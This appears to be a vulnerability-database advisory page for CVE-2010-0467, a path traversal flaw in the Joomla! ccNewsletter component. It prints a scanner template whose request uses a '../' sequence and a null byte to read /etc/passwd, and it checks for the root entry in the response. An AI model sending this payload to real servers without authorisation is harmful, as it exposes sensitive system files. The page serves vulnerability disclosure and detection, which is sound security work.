CVE-2010-0467: Joomla! Component CCNewsLetter - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! | POC: 已公开

漏洞描述

A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.

PoC代码[已公开]

id: CVE-2010-0467

info:
  name: Joomla! Component CCNewsLetter - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: Apply all relevant security patches and upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11282
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0467
    - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
    - http://www.exploit-db.com/exploits/11277
    - http://www.exploit-db.com/exploits/11282
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2010-0467
    cwe-id: CWE-22
    epss-score: 0.24055
    epss-percentile: 0.95843
    cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: chillcreations
    product: com_ccnewsletter
  tags: cve2010,cve,joomla,lfi,edb,chillcreations

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402201d5bae92658ecabe948b0370e392f801f745ee80b8e2c919cfbd333c467cbb3602205237a770b2c332336721caaa501e05615bc004f0ca2d80a7dd32609f7a7ee758:922c64590222798bb761d5b6d8e72950

相关漏洞推荐